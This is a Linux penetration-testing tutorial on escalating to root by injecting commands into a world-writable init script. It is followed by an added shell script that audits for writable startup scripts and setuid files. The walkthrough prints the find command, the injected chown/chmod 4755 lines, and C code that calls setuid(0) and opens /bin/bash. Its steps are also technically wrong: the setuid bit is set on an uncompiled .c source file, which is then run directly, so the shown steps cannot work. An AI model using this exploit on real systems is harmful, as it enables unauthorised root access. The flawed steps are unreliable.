Exploiting Startup Scripts
Startup scripts are scripts that are executed at boot time. Linux startup scripts are generally located in /etc/init.d, but this location can vary depending on the distribution. For example, you may find startup scripts under these locations: /etc/rc.d, /etc/rc.d/init.d, or /etc/init. These scripts can either be default scripts that are pre-installed, or they can be user-created startup scripts.
To attack a vulnerable startup script, you must determine if you have write access to a certain startup script. If you have write access, you can inject your own malicious commands into the script and either wait for a reboot, or force a reboot to trigger the script.
Below is an example of how you might attack a vulnerable startup script:
First, identify any files that have write access enabled on them using the command below, and specifically look for files under the /etc/init.d directory. (We can exclude irrelevant output by piping our output through "| grep -v".)
user@target:$ find / -perm -o+w -type f 2>/dev/null | grep -v '/sys\|proc'
/foo/bar
/etc/init.d/cleanup.sh
/foo/bar/foo
We notice that there is a startup script called cleanup.sh under the /etc/init.d directory that we have write access to. First, we should back this file up and then we can edit the startup script:
user@target:$ cp cleanup.sh /home/user/cleanup.sh.bak
user@target:$ nano cleanup.sh
We open the file and replace the original script with our malicious script:
chown root:root /home/user/pwn_script.c
chmod 4755 /home/user/pwn_script.c
The script we just added to the startup script will change the file pwn_script.c in the user's home directory so it is owned by root and has the SUID bit set, which means when we run it, it will be run as root. Wait, we haven't created pwn_script.c yet, so let's go ahead and do that. We need to make sure it is located where the startup script points to, which in this case is /home/user/pwn_script.c.
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>   /* setgid() and setuid() are declared here */

int main(void)
{
    /* The binary runs with an effective uid of 0 because of the SUID bit;
       make the real gid/uid 0 as well before handing off to a shell. */
    setgid(0);
    setuid(0);
    system("/bin/bash");
    return 0;
}
After we have created our malicious startup file and our pwn_script.c, we just need to wait for a reboot or trigger it manually.
After the system reboots, we can navigate to our pwn_script.c file and see the new permissions on it:
-rwsrwxr-x 1 root root 6700 April 9 14:43 /home/user/pwn_script.c
Notice the SUID bit is set on the permissions and the owner is root. After we run pwn_script.c, we should now have a root shell.
user@target:$ ./pwn_script.c
bash-4.1# whoami
root
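As an added defensive counterpart (this is example code, not code from the original page), the following POSIX sh audit detects the two conditions this walkthrough depends on: startup scripts that any local user can write to (the condition found at the start), and setuid executables sitting under home directories (the artifact left behind at the end). The directory lists are assumptions chosen to mirror the paths named above; the check functions accept whatever directories you pass them, so they can be pointed at other locations.

```shell
#!/bin/sh
# Added defensive audit example; not part of the original page.
# Check 1: startup scripts with the "other write" bit set.
# Check 2: setuid executables under home directories.
# Both directory lists are assumptions matching the paths discussed above.

STARTUP_DIRS="/etc/init.d /etc/rc.d /etc/rc.d/init.d /etc/init"
HOME_DIRS="/home /root"

# Print every regular file under the given directories that is world-writable,
# one path per line. Directories that do not exist are skipped silently.
find_world_writable_scripts() {
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        find "$dir" -type f -perm -o+w 2>/dev/null || true
    done
    return 0
}

# Print every regular file under the given directories that has the setuid
# bit (mode 4000) set, one path per line.
find_setuid_files() {
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        find "$dir" -type f -perm -4000 2>/dev/null || true
    done
    return 0
}

# Run a finder function with its arguments and print how many paths it
# reported; prints 0 when there is nothing to report.
count_findings() {
    "$@" | wc -l | tr -d ' '
}

# Human-readable report over the assumed default locations.
audit_report() {
    # Unquoted on purpose: the variables are space-separated directory lists.
    scripts=$(find_world_writable_scripts $STARTUP_DIRS)
    suid=$(find_setuid_files $HOME_DIRS)
    printf 'World-writable startup scripts:\n%s\n' "${scripts:-(none)}"
    printf 'Setuid files under home directories:\n%s\n' "${suid:-(none)}"
    return 0
}

audit_report
```

Any path printed by the first check should be owned by root and have mode 755 or stricter; a setuid file under a home directory has no legitimate reason to exist on most systems and is worth comparing against a package manifest or a known-good baseline.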